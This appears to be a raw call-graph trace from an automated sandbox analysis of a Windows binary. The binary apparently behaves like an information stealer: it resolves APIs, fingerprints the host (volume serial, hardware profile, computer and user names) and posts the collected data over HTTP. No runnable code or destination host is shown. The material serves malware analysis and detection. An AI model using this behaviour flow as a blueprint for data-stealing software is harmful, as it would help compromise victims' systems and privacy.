4024f9 9 API calls 80301->80302 80303 403783 80302->80303 80304 4024f9 9 API calls 80303->80304 80305 403794 80304->80305 80306 4024f9 9 API calls 80305->80306 80307 4037a5 80306->80307 80308 4024f9 9 API calls 80307->80308 80309 4037b6 80308->80309 80310 4024f9 9 API calls 80309->80310 80311 4037c7 80310->80311 80312 4024f9 9 API calls 80311->80312 80313 4037d8 80312->80313 80314 4024f9 9 API calls 80313->80314 80315 4037e9 80314->80315 80316 4024f9 9 API calls 80315->80316 80317 4037fa 80316->80317 80318 4024f9 9 API calls 80317->80318 80319 40380b 80318->80319 80320 4024f9 9 API calls 80319->80320 80321 40381c 80320->80321 80322 4024f9 9 API calls 80321->80322 80323 40382d 80322->80323 80324 4024f9 9 API calls 80323->80324 80325 40383e 80324->80325 80326 4024f9 9 API calls 80325->80326 80327 40384f 80326->80327 80328 4024f9 9 API calls 80327->80328 80329 403860 80328->80329 80330 4024f9 9 API calls 80329->80330 80331 403871 80330->80331 80332 4024f9 9 API calls 80331->80332 80333 403882 80332->80333 80334 4024f9 9 API calls 80333->80334 80335 403893 80334->80335 80336 4024f9 9 API calls 80335->80336 80337 4038a4 80336->80337 80338 4024f9 9 API calls 80337->80338 80339 4038b5 80338->80339 80340 4024f9 9 API calls 80339->80340 80341 4038c6 80340->80341 80342 4024f9 9 API calls 80341->80342 80343 4038d7 80342->80343 80344 4024f9 9 API calls 80343->80344 80345 4038e8 80344->80345 80346 4024f9 9 API calls 80345->80346 80347 4038f9 80346->80347 80348 4024f9 9 API calls 80347->80348 80349 40390a 80348->80349 80350 4024f9 9 API calls 80349->80350 80351 40391b 80350->80351 80352 4024f9 9 API calls 80351->80352 80353 40392c 80352->80353 80354 4024f9 9 API calls 80353->80354 80355 40393d 80354->80355 80356 4024f9 9 API calls 80355->80356 80357 40394e 80356->80357 80358 4024f9 9 API calls 80357->80358 80359 40395f 80358->80359 80360 4024f9 9 API calls 80359->80360 80361 403970 80360->80361 80362 4024f9 9 API calls 80361->80362 80363 403981 80362->80363 80364 4024f9 9 API calls 80363->80364 80365 403992 80364->80365 80366 4024f9 9 API calls 80365->80366 80367 4039a3 80366->80367 80368 4024f9 9 API calls 80367->80368 80369 4039b4 80368->80369 80370 4024f9 9 API calls 80369->80370 80371 4039c5 80370->80371 80372 4024f9 9 API calls 80371->80372 80373 4039d6 80372->80373 80374 4024f9 9 API calls 80373->80374 80375 4039e7 80374->80375 80376 4024f9 9 API calls 80375->80376 80377 4039f8 80376->80377 80378 4024f9 9 API calls 80377->80378 80379 403a09 80378->80379 80380 4024f9 9 API calls 80379->80380 80381 403a1a 80380->80381 80382 4024f9 9 API calls 80381->80382 80383 403a2b 80382->80383 80384 4024f9 9 API calls 80383->80384 80385 403a3c 80384->80385 80386 4024f9 9 API calls 80385->80386 80387 403a4d 80386->80387 80388 4024f9 9 API calls 80387->80388 80389 403a5e 80388->80389 80390 4024f9 9 API calls 80389->80390 80391 403a6f 80390->80391 80392 416676 80391->80392 80393 416683 43 API calls 80392->80393 80394 416a5b 9 API calls 80392->80394 80393->80394 80395 416b6a 80394->80395 80396 416afc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80394->80396 80397 416b77 8 API calls 80395->80397 80398 416c2a 80395->80398 80396->80395 80397->80398 80399 416ca1 80398->80399 80400 416c33 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80398->80400 80401 416d33 80399->80401 80402 416cae 6 API calls 80399->80402 80400->80399 80403 416d40 9 API calls 80401->80403 80404 416e0a 80401->80404 80402->80401 80403->80404 80405 416e81 80404->80405 80406 416e13 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80404->80406 80407 416eb3 80405->80407 80408 416e8a GetProcAddress GetProcAddress 80405->80408 80406->80405 80409 416ee5 80407->80409 80410 416ebc GetProcAddress GetProcAddress 80407->80410 80408->80407 80411 416fd1 80409->80411 80412 416ef2 10 API calls 80409->80412 80410->80409 80413 417031 80411->80413 80414 416fda GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80411->80414 80412->80411 80415 41703a GetProcAddress 80413->80415 80416 41704c 80413->80416 80414->80413 80415->80416 80417 417055 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80416->80417 80418 4170ac 80416->80418 80417->80418 80419 4170b5 GetProcAddress 80418->80419 80420 415af4 80418->80420 80419->80420 80421 40fb47 _EH_prolog 80420->80421 80422 40e912 lstrcpy 80421->80422 80423 40fb6e 80422->80423 80424 40e912 lstrcpy 80423->80424 80425 40fb85 GetSystemTime 80424->80425 80426 40fba3 80425->80426 80426->79639 80429 40ea54 80427->80429 80428 40ea78 80428->79648 80429->80428 80430 40ea66 lstrcpy lstrcat 80429->80430 80430->80428 80432 40e949 lstrcpy 80431->80432 80433 4010cc 80432->80433 80434 40e949 lstrcpy 80433->80434 80435 4010dc 80434->80435 80436 40e949 lstrcpy 80435->80436 80437 4010ec 80436->80437 80438 40e949 lstrcpy 80437->80438 80439 401108 80438->80439 80440 41283a _EH_prolog 80439->80440 80441 4121c3 _EH_prolog 80440->80441 80442 412860 80441->80442 80443 40e986 2 API calls 80442->80443 80444 412874 80443->80444 80445 40e986 2 API calls 80444->80445 80446 412884 80445->80446 80447 40e986 2 API calls 80446->80447 80448 412891 80447->80448 80449 40e912 lstrcpy 80448->80449 80450 41289e 80449->80450 80451 40e912 lstrcpy 80450->80451 80452 4128af 80451->80452 80453 40e912 lstrcpy 80452->80453 80454 4128c0 80453->80454 80455 40e912 lstrcpy 80454->80455 80456 4128d1 80455->80456 80457 40e912 lstrcpy 80456->80457 80458 4128e2 80457->80458 80459 40e912 lstrcpy 80458->80459 80486 4128f3 80459->80486 80460 40211b lstrcpy 80460->80486 80462 40214f lstrcpy 80462->80486 80463 412a1f StrCmpCA 80463->80486 80464 412ab5 StrCmpCA 80465 413376 80464->80465 80464->80486 80466 40e9d0 lstrcpy 80465->80466 80467 413385 80466->80467 81375 40214f 80467->81375 80470 40e9d0 lstrcpy 80472 41339f 80470->80472 80471 412c8c StrCmpCA 80473 41332e 80471->80473 80471->80486 81378 4022a8 lstrcpy 80472->81378 80474 40e9d0 lstrcpy 80473->80474 80476 41333d 80474->80476 80475 402169 lstrcpy 80475->80486 81373 40219d lstrcpy 80476->81373 80480 413346 80483 40e9d0 lstrcpy 80480->80483 80481 4133b4 80484 40e9d0 lstrcpy 80481->80484 80482 412e63 StrCmpCA 80485 4132e9 80482->80485 80482->80486 80489 413357 80483->80489 80490 4133c2 80484->80490 80487 40e9d0 lstrcpy 80485->80487 80486->80460 80486->80462 80486->80463 80486->80464 80486->80471 80486->80475 80486->80482 80497 41303a StrCmpCA 80486->80497 80502 412046 33 API calls 80486->80502 80504 412bf6 StrCmpCA 80486->80504 80510 40219d lstrcpy 80486->80510 80512 41320b StrCmpCA 80486->80512 80514 4021b7 lstrcpy 80486->80514 80519 402253 lstrcpy 80486->80519 80520 402239 lstrcpy 80486->80520 80522 412dcd StrCmpCA 80486->80522 80527 411f59 28 API calls 80486->80527 80528 4021eb lstrcpy 80486->80528 80532 402205 lstrcpy 80486->80532 80533 4010b1 _EH_prolog lstrcpy 80486->80533 80537 402287 lstrcpy 80486->80537 80539 412fa4 StrCmpCA 80486->80539 80542 40e949 lstrcpy 80486->80542 80545 41317b StrCmpCA 80486->80545 80546 40e9d0 lstrcpy 80486->80546 81357 402135 80486->81357 81362 402183 lstrcpy 80486->81362 81363 4021d1 lstrcpy 80486->81363 81364 40221f lstrcpy 80486->81364 81365 40226d lstrcpy 80486->81365 80488 4132f8 80487->80488 81371 4021eb lstrcpy 80488->81371 81374 4022c2 lstrcpy 80489->81374 81379 412200 lstrcpy _EH_prolog 80490->81379 80495 413301 80498 40e9d0 lstrcpy 80495->80498 80496 4132d6 80499 40e9d0 lstrcpy 80496->80499 80497->80486 80500 413298 80497->80500 80501 413312 80498->80501 80509 413275 80499->80509 80503 40e9d0 lstrcpy 80500->80503 81372 4022dc lstrcpy 80501->81372 80502->80486 80505 4132a7 80503->80505 80504->80486 81369 402239 lstrcpy 80505->81369 81368 412200 lstrcpy _EH_prolog 80509->81368 80510->80486 80511 4132b0 80515 40e9d0 lstrcpy 80511->80515 80517 413226 80512->80517 80518 413216 Sleep 80512->80518 80514->80486 80516 4132c1 80515->80516 81370 4022f6 lstrcpy 80516->81370 80521 40e9d0 lstrcpy 80517->80521 80518->80486 80519->80486 80520->80486 80523 413235 80521->80523 80522->80486 81366 402287 lstrcpy 80523->81366 80527->80486 80528->80486 80529 413293 80531 4124d3 _EH_prolog 80529->80531 80530 41323e 80534 40e9d0 lstrcpy 80530->80534 80535 413436 80531->80535 80532->80486 80533->80486 80536 41324f 80534->80536 81360 401061 _EH_prolog 80535->81360 81367 402310 lstrcpy 80536->81367 80537->80486 80539->80486 80540 413442 80547 4125e1 80540->80547 80542->80486 80543 413267 80544 40e9d0 lstrcpy 80543->80544 80544->80509 80545->80486 80546->80486 80548 40e9d0 lstrcpy 80547->80548 80549 4125f1 80548->80549 80550 40e9d0 lstrcpy 80549->80550 80551 4125fd 80550->80551 80552 40e9d0 lstrcpy 80551->80552 80553 412609 80552->80553 80554 4124d3 _EH_prolog 80553->80554 80555 4124f3 80554->80555 80555->79658 80557 40e960 80556->80557 80558 40e975 80557->80558 80559 40e96d lstrcpy 80557->80559 80558->79665 80559->80558 80560->79675 80562 40e912 lstrcpy 80561->80562 80563 402116 80562->80563 80564 40f52a _EH_prolog GetWindowsDirectoryA 80563->80564 80565 40f563 GetVolumeInformationA 80564->80565 80566 40f55c 80564->80566 80567 40f593 80565->80567 80566->80565 80568 40f5c5 GetProcessHeap HeapAlloc 80567->80568 80569 40f5e8 wsprintfA lstrcat 80568->80569 80570 40f5da 80568->80570 81380 40f4ef GetCurrentHwProfileA 80569->81380 80571 40e912 lstrcpy 80570->80571 80573 40f5e3 80571->80573 80573->79682 80574 40f618 80575 40f627 lstrlenA 80574->80575 80576 40f63b 80575->80576 81384 41013f lstrcpy malloc strncpy 80576->81384 80578 40f645 80579 40f653 lstrcat 80578->80579 80580 40f666 80579->80580 80581 40e912 lstrcpy 80580->80581 80582 40f677 80581->80582 80582->80573 80584 40e949 lstrcpy 80583->80584 80585 403b47 80584->80585 81385 403a76 _EH_prolog 80585->81385 80587 403b53 80588 40e912 lstrcpy 80587->80588 80589 403b70 80588->80589 80590 40e912 lstrcpy 80589->80590 80591 403b83 80590->80591 80592 40e912 lstrcpy 80591->80592 80593 403b94 80592->80593 80594 40e912 lstrcpy 80593->80594 80595 403ba5 80594->80595 80596 40e912 lstrcpy 80595->80596 80597 403bb6 80596->80597 80598 403bc6 InternetOpenA StrCmpCA 80597->80598 80599 403be8 80598->80599 80600 404144 InternetCloseHandle 80599->80600 80601 40fb47 3 API calls 80599->80601 80614 404158 80600->80614 80602 403bfe 80601->80602 80603 40ea17 3 API calls 80602->80603 80604 403c11 80603->80604 80605 40e9d0 lstrcpy 80604->80605 80606 403c1e 80605->80606 80607 40ea8b 4 API calls 80606->80607 80608 403c47 80607->80608 80609 40e9d0 lstrcpy 80608->80609 80610 403c54 80609->80610 80611 40ea8b 4 API calls 80610->80611 80612 403c71 80611->80612 80613 40e9d0 lstrcpy 80612->80613 80615 403c7e 80613->80615 80614->79685 80616 40ea17 3 API calls 80615->80616 80617 403c9a 80616->80617 80618 40e9d0 lstrcpy 80617->80618 80619 403ca7 80618->80619 80620 40ea8b 4 API calls 80619->80620 80621 403cc4 80620->80621 80622 40e9d0 lstrcpy 80621->80622 80623 403cd1 80622->80623 80624 40ea8b 4 API calls 80623->80624 80625 403cee 80624->80625 80626 40e9d0 lstrcpy 80625->80626 80627 403cfb 80626->80627 80628 40ea8b 4 API calls 80627->80628 80629 403d19 80628->80629 80630 40ea17 3 API calls 80629->80630 80631 403d2c 80630->80631 80632 40e9d0 lstrcpy 80631->80632 80633 403d39 80632->80633 80634 403d51 InternetConnectA 80633->80634 80634->80600 80635 403d77 HttpOpenRequestA 80634->80635 80636 403db0 80635->80636 80637 40413b InternetCloseHandle 80635->80637 80638 403db4 InternetSetOptionA 80636->80638 80639 403dca 80636->80639 80637->80600 80638->80639 80640 40ea8b 4 API calls 80639->80640 80641 403ddb 80640->80641 80642 40e9d0 lstrcpy 80641->80642 80643 403de8 80642->80643 80644 40ea17 3 API calls 80643->80644 80645 403e04 80644->80645 80646 40e9d0 lstrcpy 80645->80646 80647 403e11 80646->80647 80648 40ea8b 4 API calls 80647->80648 80649 403e2e 80648->80649 80650 40e9d0 lstrcpy 80649->80650 80651 403e3b 80650->80651 80652 40ea8b 4 API calls 80651->80652 80653 403e59 80652->80653 80654 40e9d0 lstrcpy 80653->80654 80655 403e66 80654->80655 80656 40ea8b 4 API calls 80655->80656 80657 403e83 80656->80657 80658 40e9d0 lstrcpy 80657->80658 80659 403e90 80658->80659 80660 40ea8b 4 API calls 80659->80660 80661 403ead 80660->80661 80662 40e9d0 lstrcpy 80661->80662 80663 403eba 80662->80663 80664 40ea17 3 API calls 80663->80664 80665 403ed6 80664->80665 80666 40e9d0 lstrcpy 80665->80666 80667 403ee3 80666->80667 80668 40ea8b 4 API calls 80667->80668 80669 403f00 80668->80669 80670 40e9d0 lstrcpy 80669->80670 80671 403f0d 80670->80671 80672 40ea8b 4 API calls 80671->80672 80673 403f2a 80672->80673 80674 40e9d0 lstrcpy 80673->80674 80675 403f37 80674->80675 80676 40ea17 3 API calls 80675->80676 80677 403f53 80676->80677 80678 40e9d0 lstrcpy 80677->80678 80679 403f60 80678->80679 80680 40ea8b 4 API calls 80679->80680 80681 403f7d 80680->80681 80682 40e9d0 lstrcpy 80681->80682 80683 403f8a 80682->80683 80684 40ea8b 4 API calls 80683->80684 80685 403fa8 80684->80685 80686 40e9d0 lstrcpy 80685->80686 80687 403fb5 80686->80687 80688 40ea8b 4 API calls 80687->80688 80689 403fd2 80688->80689 80690 40e9d0 lstrcpy 80689->80690 80691 403fdf 80690->80691 80692 40ea8b 4 API calls 80691->80692 80693 403ffc 80692->80693 80694 40e9d0 lstrcpy 80693->80694 80695 404009 80694->80695 80696 40ea17 3 API calls 80695->80696 80697 404025 80696->80697 80698 40e9d0 lstrcpy 80697->80698 80699 404032 80698->80699 80700 40e912 lstrcpy 80699->80700 80701 40404b 80700->80701 80702 40ea17 3 API calls 80701->80702 80703 40405f 80702->80703 80704 40ea17 3 API calls 80703->80704 80705 404072 80704->80705 80706 40e9d0 lstrcpy 80705->80706 80707 40407f 80706->80707 80708 40409f lstrlenA 80707->80708 80709 4040af 80708->80709 80710 4040b8 lstrlenA 80709->80710 81393 40eb3c 80710->81393 80712 4040c8 HttpSendRequestA 80713 404111 InternetReadFile 80712->80713 80714 404128 InternetCloseHandle 80713->80714 80717 4040d7 80713->80717 81394 40e97d 80714->81394 80716 40ea8b 4 API calls 80716->80717 80717->80713 80717->80714 80717->80716 80718 40e9d0 lstrcpy 80717->80718 80718->80717 81398 40eb3c 80719->81398 80721 410c1d StrCmpCA 80722 410c28 ExitProcess 80721->80722 80723 410c2f 80721->80723 80724 410c3f strtok_s 80723->80724 80725 410d8c 80724->80725 80738 410c50 80724->80738 80725->79687 80726 410d71 strtok_s 80726->80725 80726->80738 80727 410ca0 StrCmpCA 80727->80726 80727->80738 80728 410d10 StrCmpCA 80728->80726 80728->80738 80729 410d25 StrCmpCA 80729->80726 80730 410c84 StrCmpCA 80730->80726 80730->80738 80731 410ce6 StrCmpCA 80731->80726 80731->80738 80732 410c68 StrCmpCA 80732->80726 80732->80738 80733 410cfb StrCmpCA 80733->80726 80733->80738 80734 410d3b StrCmpCA 80734->80726 80735 410d5d StrCmpCA 80735->80726 80736 410cbc StrCmpCA 80736->80726 80736->80738 80737 40e986 2 API calls 80737->80738 80738->80726 80738->80727 80738->80728 80738->80729 80738->80730 80738->80731 80738->80732 80738->80733 80738->80734 80738->80735 80738->80736 80738->80737 80740 40e949 lstrcpy 80739->80740 80741 4051b3 80740->80741 80742 403a76 6 API calls 80741->80742 80743 4051bf 80742->80743 80744 40e912 lstrcpy 80743->80744 80745 4051dc 80744->80745 80746 40e912 lstrcpy 80745->80746 80747 4051ef 80746->80747 80748 40e912 lstrcpy 80747->80748 80749 405200 80748->80749 80750 40e912 lstrcpy 80749->80750 80751 405211 80750->80751 80752 40e912 lstrcpy 80751->80752 80753 405222 80752->80753 80754 405232 InternetOpenA StrCmpCA 80753->80754 80755 405254 80754->80755 80756 405924 InternetCloseHandle 80755->80756 80758 40fb47 3 API calls 80755->80758 80757 40593f 80756->80757 81405 40628e CryptStringToBinaryA 80757->81405 80759 40526a 80758->80759 80760 40ea17 3 API calls 80759->80760 80762 40527d 80760->80762 80764 40e9d0 lstrcpy 80762->80764 80768 40528a 80764->80768 80765 40e986 2 API calls 80766 405958 80765->80766 80767 40ea8b 4 API calls 80766->80767 80769 405966 80767->80769 80771 40ea8b 4 API calls 80768->80771 80770 40e9d0 lstrcpy 80769->80770 80775 405972 80770->80775 80772 4052b3 80771->80772 80773 40e9d0 lstrcpy 80772->80773 80774 4052c0 80773->80774 80776 40ea8b 4 API calls 80774->80776 80778 401061 _EH_prolog 80775->80778 80777 4052dd 80776->80777 80779 40e9d0 lstrcpy 80777->80779 80780 4059d0 80778->80780 80781 4052ea 80779->80781 80780->79693 80782 40ea17 3 API calls 80781->80782 80783 405306 80782->80783 80784 40e9d0 lstrcpy 80783->80784 80785 405313 80784->80785 80786 40ea8b 4 API calls 80785->80786 80787 405330 80786->80787 80788 40e9d0 lstrcpy 80787->80788 80789 40533d 80788->80789 80790 40ea8b 4 API calls 80789->80790 80791 40535a 80790->80791 80792 40e9d0 lstrcpy 80791->80792 80793 405367 80792->80793 80794 40ea8b 4 API calls 80793->80794 80795 405385 80794->80795 80796 40ea17 3 API calls 80795->80796 80797 405398 80796->80797 80798 40e9d0 lstrcpy 80797->80798 80799 4053a5 80798->80799 80800 4053bd InternetConnectA 80799->80800 80800->80756 80801 4053e3 HttpOpenRequestA 80800->80801 80802 40541a 80801->80802 80803 40591b InternetCloseHandle 80801->80803 80804 405434 80802->80804 80805 40541e InternetSetOptionA 80802->80805 80803->80756 80806 40ea8b 4 API calls 80804->80806 80805->80804 80807 405445 80806->80807 80808 40e9d0 lstrcpy 80807->80808 80809 405452 80808->80809 80810 40ea17 3 API calls 80809->80810 80811 40546e 80810->80811 80812 40e9d0 lstrcpy 80811->80812 80813 40547b 80812->80813 80814 40ea8b 4 API calls 80813->80814 80815 405498 80814->80815 80816 40e9d0 lstrcpy 80815->80816 80817 4054a5 80816->80817 80818 40ea8b 4 API calls 80817->80818 80819 4054c3 80818->80819 80820 40e9d0 lstrcpy 80819->80820 80821 4054d0 80820->80821 80822 40ea8b 4 API calls 80821->80822 80823 4054ee 80822->80823 80824 40e9d0 lstrcpy 80823->80824 80825 4054fb 80824->80825 80826 40ea8b 4 API calls 80825->80826 80827 405518 80826->80827 80828 40e9d0 lstrcpy 80827->80828 80829 405525 80828->80829 80830 40ea17 3 API calls 80829->80830 80831 405541 80830->80831 80832 40e9d0 lstrcpy 80831->80832 80833 40554e 80832->80833 80834 40ea8b 4 API calls 80833->80834 80835 40556b 80834->80835 80836 40e9d0 lstrcpy 80835->80836 80837 405578 80836->80837 80838 40ea8b 4 API calls 80837->80838 80839 405595 80838->80839 80840 40e9d0 lstrcpy 80839->80840 80841 4055a2 80840->80841 80842 40ea17 3 API calls 80841->80842 80843 4055be 80842->80843 80844 40e9d0 lstrcpy 80843->80844 80845 4055cb 80844->80845 80846 40ea8b 4 API calls 80845->80846 80847 4055e8 80846->80847 80848 40e9d0 lstrcpy 80847->80848 80849 4055f5 80848->80849 80850 40ea8b 4 API calls 80849->80850 80851 405613 80850->80851 80852 40e9d0 lstrcpy 80851->80852 80853 405620 80852->80853 80854 40ea8b 4 API calls 80853->80854 80855 40563d 80854->80855 80856 40e9d0 lstrcpy 80855->80856 80857 40564a 80856->80857 80858 40ea8b 4 API calls 80857->80858 80859 405667 80858->80859 80860 40e9d0 lstrcpy 80859->80860 80861 405674 80860->80861 80862 402101 lstrcpy 80861->80862 80863 405689 80862->80863 80864 40ea17 3 API calls 80863->80864 80865 40569b 80864->80865 80866 40e9d0 lstrcpy 80865->80866 80867 4056a8 80866->80867 80868 40ea8b 4 API calls 80867->80868 80869 4056d1 80868->80869 80870 40e9d0 lstrcpy 80869->80870 80871 4056de 80870->80871 80872 40ea8b 4 API calls 80871->80872 80873 4056fb 80872->80873 80874 40e9d0 lstrcpy 80873->80874 80875 405708 80874->80875 80876 40ea17 3 API calls 80875->80876 80877 405724 80876->80877 80878 40e9d0 lstrcpy 80877->80878 80879 405731 80878->80879 80880 40ea8b 4 API calls 80879->80880 80881 40574e 80880->80881 80882 40e9d0 lstrcpy 80881->80882 80883 40575b 80882->80883 80884 40ea8b 4 API calls 80883->80884 80885 405779 80884->80885 80886 40e9d0 lstrcpy 80885->80886 80887 405786 80886->80887 80888 40ea8b 4 API calls 80887->80888 80889 4057a3 80888->80889 80890 40e9d0 lstrcpy 80889->80890 80891 4057b0 80890->80891 80892 40ea8b 4 API calls 80891->80892 80893 4057cd 80892->80893 80894 40e9d0 lstrcpy 80893->80894 80895 4057da 80894->80895 80896 40ea17 3 API calls 80895->80896 80897 4057f6 80896->80897 80898 40e9d0 lstrcpy 80897->80898 80899 405803 80898->80899 80900 405817 lstrlenA 80899->80900 81399 40eb3c 80900->81399 80902 405828 lstrlenA GetProcessHeap HeapAlloc 81400 40eb3c 80902->81400 80904 40584a lstrlenA 81401 40eb3c 80904->81401 80906 40585a memcpy 81402 40eb3c 80906->81402 80908 40586c lstrlenA 80909 40587c 80908->80909 80910 405885 lstrlenA memcpy 80909->80910 81403 40eb3c 80910->81403 80912 4058a1 lstrlenA 81404 40eb3c 80912->81404 80914 4058b1 HttpSendRequestA 80915 4058fd InternetReadFile 80914->80915 80916 405914 InternetCloseHandle 80915->80916 80918 4058c3 80915->80918 80916->80803 80917 40ea8b 4 API calls 80917->80918 80918->80915 80918->80916 80918->80917 80919 40e9d0 lstrcpy 80918->80919 80919->80918 81410 40eb3c 80920->81410 80922 41065f strtok_s 80923 4106c8 80922->80923 80925 41066c 80922->80925 80923->79695 80924 4106b1 strtok_s 80924->80923 80924->80925 80925->80924 80926 40e986 2 API calls 80925->80926 80927 40e986 2 API calls 80925->80927 80926->80924 80927->80925 81411 40eb3c 80928->81411 80930 410508 strtok_s 80931 410619 80930->80931 80933 410519 80930->80933 80931->79703 80932 4105ca StrCmpCA 80932->80933 80933->80932 80934 40e986 2 API calls 80933->80934 80935 4105fc strtok_s 80933->80935 80936 410599 StrCmpCA 80933->80936 80937 410574 StrCmpCA 80933->80937 80938 410546 StrCmpCA 80933->80938 80934->80935 80935->80931 80935->80933 80936->80933 80937->80933 80938->80933 80940 40e912 lstrcpy 80939->80940 80941 413640 80940->80941 80942 40ea8b 4 API calls 80941->80942 80943 413655 80942->80943 80944 40e9d0 lstrcpy 80943->80944 80945 413662 80944->80945 81412 4020e7 80945->81412 80948 40ea17 3 API calls 80949 413689 80948->80949 80950 40e9d0 lstrcpy 80949->80950 80951 413696 80950->80951 80952 40ea8b 4 API calls 80951->80952 80953 4136bf 80952->80953 80954 40e9d0 lstrcpy 80953->80954 80955 4136cc 80954->80955 80956 40ea8b 4 API calls 80955->80956 80957 4136e9 80956->80957 80958 40e9d0 lstrcpy 80957->80958 80959 4136f6 80958->80959 80960 40ea8b 4 API calls 80959->80960 80961 413713 80960->80961 80962 40e9d0 lstrcpy 80961->80962 80963 413720 80962->80963 81415 40ec27 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80963->81415 80965 413731 80966 40ea8b 4 API calls 80965->80966 80967 41373e 80966->80967 80968 40e9d0 lstrcpy 80967->80968 80969 41374b 80968->80969 80970 40ea8b 4 API calls 80969->80970 80971 413768 80970->80971 80972 40e9d0 lstrcpy 80971->80972 80973 413775 80972->80973 80974 40ea8b 4 API calls 80973->80974 80975 413792 80974->80975 80976 40e9d0 lstrcpy 80975->80976 80977 41379f 80976->80977 81416 40f462 memset RegOpenKeyExA 80977->81416 80979 4137b0 80980 40ea8b 4 API calls 80979->80980 80981 4137bd 80980->80981 80982 40e9d0 lstrcpy 80981->80982 80983 4137ca 80982->80983 80984 40ea8b 4 API calls 80983->80984 80985 4137e7 80984->80985 80986 40e9d0 lstrcpy 80985->80986 80987 4137f4 80986->80987 80988 40ea8b 4 API calls 80987->80988 80989 413811 80988->80989 80990 40e9d0 lstrcpy 80989->80990 80991 41381e 80990->80991 80992 40f4ef 2 API calls 80991->80992 80993 413833 80992->80993 80994 40ea17 3 API calls 80993->80994 80995 413845 80994->80995 80996 40e9d0 lstrcpy 80995->80996 80997 413852 80996->80997 80998 40ea8b 4 API calls 80997->80998 80999 41387b 80998->80999 81000 40e9d0 lstrcpy 80999->81000 81001 413888 81000->81001 81002 40ea8b 4 API calls 81001->81002 81003 4138a5 81002->81003 81004 40e9d0 lstrcpy 81003->81004 81005 4138b2 81004->81005 81006 40f52a 13 API calls 81005->81006 81007 4138c7 81006->81007 81008 40ea17 3 API calls 81007->81008 81009 4138d9 81008->81009 81010 40e9d0 lstrcpy 81009->81010 81011 4138e6 81010->81011 81012 40ea8b 4 API calls 81011->81012 81013 41390f 81012->81013 81014 40e9d0 lstrcpy 81013->81014 81015 41391c 81014->81015 81016 40ea8b 4 API calls 81015->81016 81017 413939 81016->81017 81018 40e9d0 lstrcpy 81017->81018 81019 413946 81018->81019 81020 413952 GetCurrentProcessId 81019->81020 81420 40ffec OpenProcess 81020->81420 81023 40ea17 3 API calls 81024 413975 81023->81024 81025 40e9d0 lstrcpy 81024->81025 81026 413982 81025->81026 81027 40ea8b 4 API calls 81026->81027 81028 4139ab 81027->81028 81029 40e9d0 lstrcpy 81028->81029 81030 4139b8 81029->81030 81031 40ea8b 4 API calls 81030->81031 81032 4139d5 81031->81032 81033 40e9d0 lstrcpy 81032->81033 81034 4139e2 81033->81034 81035 40ea8b 4 API calls 81034->81035 81036 4139ff 81035->81036 81037 40e9d0 lstrcpy 81036->81037 81038 413a0c 81037->81038 81039 40ea8b 4 API calls 81038->81039 81040 413a29 81039->81040 81041 40e9d0 lstrcpy 81040->81041 81042 413a36 81041->81042 81425 40f698 GetProcessHeap HeapAlloc 81042->81425 81045 40ea8b 4 API calls 81046 413a54 81045->81046 81047 40e9d0 lstrcpy 81046->81047 81048 413a61 81047->81048 81049 40ea8b 4 API calls 81048->81049 81050 413a7e 81049->81050 81051 40e9d0 lstrcpy 81050->81051 81052 413a8b 81051->81052 81053 40ea8b 4 API calls 81052->81053 81054 413aa8 81053->81054 81055 40e9d0 lstrcpy 81054->81055 81056 413ab5 81055->81056 81431 40f7ab _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 81056->81431 81059 40ea17 3 API calls 81060 413adc 81059->81060 81061 40e9d0 lstrcpy 81060->81061 81062 413ae9 81061->81062 81063 40ea8b 4 API calls 81062->81063 81064 413b12 81063->81064 81065 40e9d0 lstrcpy 81064->81065 81066 413b1f 81065->81066 81067 40ea8b 4 API calls 81066->81067 81068 413b3c 81067->81068 81069 40e9d0 lstrcpy 81068->81069 81070 413b49 81069->81070 81445 40f934 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 81070->81445 81073 40ea17 3 API calls 81074 413b70 81073->81074 81075 40e9d0 lstrcpy 81074->81075 81076 413b7d 81075->81076 81077 40ea8b 4 API calls 81076->81077 81078 413ba6 81077->81078 81079 40e9d0 lstrcpy 81078->81079 81080 413bb3 81079->81080 81081 40ea8b 4 API calls 81080->81081 81082 413bd0 81081->81082 81083 40e9d0 lstrcpy 81082->81083 81084 413bdd 81083->81084 81459 40ebec GetProcessHeap HeapAlloc GetComputerNameA 81084->81459 81087 40ea8b 4 API calls 81088 413bfb 81087->81088 81089 40e9d0 lstrcpy 81088->81089 81090 413c08 81089->81090 81091 40ea8b 4 API calls 81090->81091 81092 413c25 81091->81092 81093 40e9d0 lstrcpy 81092->81093 81094 413c32 81093->81094 81095 40ea8b 4 API calls 81094->81095 81096 413c4f 81095->81096 81097 40e9d0 lstrcpy 81096->81097 81098 413c5c 81097->81098 81461 40ebba GetProcessHeap HeapAlloc GetUserNameA 81098->81461 81100 413c6d 81101 40ea8b 4 API calls 81100->81101 81102 413c7a 81101->81102 81103 40e9d0 lstrcpy 81102->81103 81104 413c87 81103->81104 81105 40ea8b 4 API calls 81104->81105 81106 413ca4 81105->81106 81107 40e9d0 lstrcpy 81106->81107 81108 413cb1 81107->81108 81109 40ea8b 4 API calls 81108->81109 81110 413cce 81109->81110 81111 40e9d0 lstrcpy 81110->81111 81112 413cdb 81111->81112 81462 40f3ed 7 API calls 81112->81462 81115 40ea17 3 API calls 81116 413d02 81115->81116 81117 40e9d0 lstrcpy 81116->81117 81118 413d0f 81117->81118 81119 40ea8b 4 API calls 81118->81119 81120 413d38 81119->81120 81121 40e9d0 lstrcpy 81120->81121 81122 413d45 81121->81122 81123 40ea8b 4 API calls 81122->81123 81124 413d62 81123->81124 81125 40e9d0 lstrcpy 81124->81125 81126 413d6f 81125->81126 81465 40ecd4 _EH_prolog 81126->81465 81129 40ea17 3 API calls 81130 413d99 81129->81130 81131 40e9d0 lstrcpy 81130->81131 81132 413da6 81131->81132 81133 40ea8b 4 API calls 81132->81133 81134 413dd5 81133->81134 81135 40e9d0 lstrcpy 81134->81135 81136 413de2 81135->81136 81137 40ea8b 4 API calls 81136->81137 81138 413e02 81137->81138 81139 40e9d0 lstrcpy 81138->81139 81140 413e0f 81139->81140 81475 40ec27 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 81140->81475 81142 413e20 81143 40ea8b 4 API calls 